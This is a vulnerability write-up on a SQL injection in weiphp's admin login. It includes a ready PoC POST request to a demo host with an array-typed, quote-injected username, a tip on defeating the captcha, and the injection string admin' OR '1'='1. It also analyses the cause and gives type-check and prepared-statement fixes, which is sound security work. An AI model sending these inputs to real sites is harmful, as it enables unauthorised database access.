Catalogue
1. Vulnerability Description
2. Vulnerability Trigger Condition
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
5. Defense Methods
6. Defensive Thinking
1. Vulnerability Description
The admin login action of weiphp (application/admin/controller/publiccontroller.class.php) hands the submitted username and password straight to the user model's login lookup without any input filtering, so a crafted login POST can inject SQL.
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2016-0190216
2. Vulnerability Trigger Condition
0x1: PoC

URL (POST): http://demo.weiphp.cn/index.php?s=/admin/public/login.html
POST body:  username[0]=admin'&username[1]=xxx*&password=123

Note that username is submitted as an array (username[0], username[1]) rather than a plain string; the trailing * in username[1] is the conventional sqlmap marker for a custom injection point.
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
/application/admin/controller/publiccontroller.class.php
ThinkPHP binds request parameters to the action's arguments by name, so the array submitted as username[] in the PoC arrives in $username unchanged.

public function login($username = null, $password = null, $verify = null){
    /* Read the configuration stored in the database */
    $config = S('DB_CONFIG_DATA');
    if(!$config){
        $config = D('Config')->lists();
        S('DB_CONFIG_DATA', $config);
    }
    C($config); // add the configuration

    // The captcha is checked here, but an attacker who fetches the captcha
    // image over HTTP and feeds the solved value into each request gets past this layer.
    if(IS_POST){
        /* Check the captcha TODO: */
        if(C('WEB_SITE_VERIFY') && !check_verify($verify)){
            $this->error('Verification code input error!');
        }

        /* Log the user in */
        $User = D('Common/User');
        // $username and $password are passed on with no input filtering,
        // which leads to SQL injection in the user lookup
        if($User->login($username, $password, 'admin_login')){ // user logged in
            // ...
5. Defense Methods
/application/admin/controller/publiccontroller.class.php
public function login($username = null, $password = null, $verify = null){
    /* Read the configuration stored in the database */
    $config = S('DB_CONFIG_DATA');
    if(!$config){
        $config = D('Config')->lists();
        S('DB_CONFIG_DATA', $config);
    }
    C($config); // add the configuration

    if(IS_POST){
        /* Check the captcha TODO: */
        if(C('WEB_SITE_VERIFY') && !check_verify($verify)){
            $this->error('Verification code input error!');
        }

        /* Log the user in */
        $User = D('Common/User');
        /* SQL injection protection */
        $username = mysql_real_escape_string($username);
        $password = mysql_real_escape_string($password);

        if($User->login($username, $password, 'admin_login')){ // user logged in
            // ...

Two caveats on this fix. First, mysql_real_escape_string belongs to the old ext/mysql extension: it needs an open ext/mysql connection to escape against, it was deprecated in PHP 5.5 and it no longer exists in PHP 7. Second, escaping is the wrong tool for this particular bug: the PoC does not send a quoted string at all, it sends an array, and an escaping function given an array only emits a warning and returns null. The robust fix is to reject any login parameter that is not a plain string (is_string) before it reaches the model, and to keep the lookup parameterised so the value is bound rather than spliced into SQL text.
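The following is an added example written for this page; it is not code from weiphp or ThinkPHP. It reproduces in plain PHP what the PoC in section 2 does to the login parameters (parse_str builds the same array the engine would put in $_POST), then contrasts a concatenated lookup with the type-checked, parameterised lookup recommended above. The user table, its columns, the in-memory SQLite stand-in for MySQL and the helper names (requireString, findUser, findUserUnsafe) are all assumptions made for the example.

```php
<?php
// Added example, not weiphp/ThinkPHP code. Table, columns and helper names are
// assumptions; the request body below is constructed from the PoC in section 2.

// 1. How PHP parses the PoC body: "username[...]" becomes an array, not a string.
//    (parse_str mirrors what the engine does for $_POST; constructed input.)
parse_str("username[0]=admin'&username[1]=xxx*&password=123", $post);
var_dump($post['username']); // array(2) { [0]=> "admin'", [1]=> "xxx*" }

// In-memory SQLite stands in for the MySQL user table (constructed fixture).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
$db->exec("INSERT INTO user (username) VALUES ('admin'), ('editor')");

// 2. The broken pattern: the value is spliced into SQL text, so a quote in it
//    rewrites the WHERE clause. Kept only to demonstrate the failure.
function findUserUnsafe(PDO $db, string $username): ?array
{
    $sql = "SELECT id, username FROM user WHERE username = '$username'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Reject anything that is not a plain string before it reaches the query.
//    This is the check the controller lacks; it is what lets username[] in.
function requireString(array $input, string $key): string
{
    if (!isset($input[$key]) || !is_string($input[$key])) {
        throw new InvalidArgumentException("$key must be a plain string");
    }
    return $input[$key];
}

// 4. The safe pattern: the value is bound as a parameter and never interpreted
//    as SQL, so "admin' OR '1'='1" is simply a username that does not exist.
function findUser(PDO $db, string $username): ?array
{
    $stmt = $db->prepare('SELECT id, username FROM user WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$payload = "admin' OR '1'='1";
var_dump(findUserUnsafe($db, $payload)['username']); // string(5) "admin": the quote broke out of the literal
var_dump(findUser($db, $payload));                    // NULL: the string was searched for literally

try {
    requireString($post, 'username');                 // the PoC body from above
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;     // rejected: username must be a plain string
}
echo findUser($db, 'admin')['username'], PHP_EOL;     // admin
```

Run it with the pdo_sqlite extension enabled (php example.php). The type check in requireString is what stops the PoC's array before any query is built, and the prepared statement in findUser is what makes a stray quote harmless for ordinary string input; the two are complementary, and neither depends on a MySQL connection being open the way mysql_real_escape_string does.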
6. Defensive Thinking
Copyright (c) Littlehann All rights reserved
weiphp/application/admin/controller/publiccontroller.class.php Login SQL injection Vul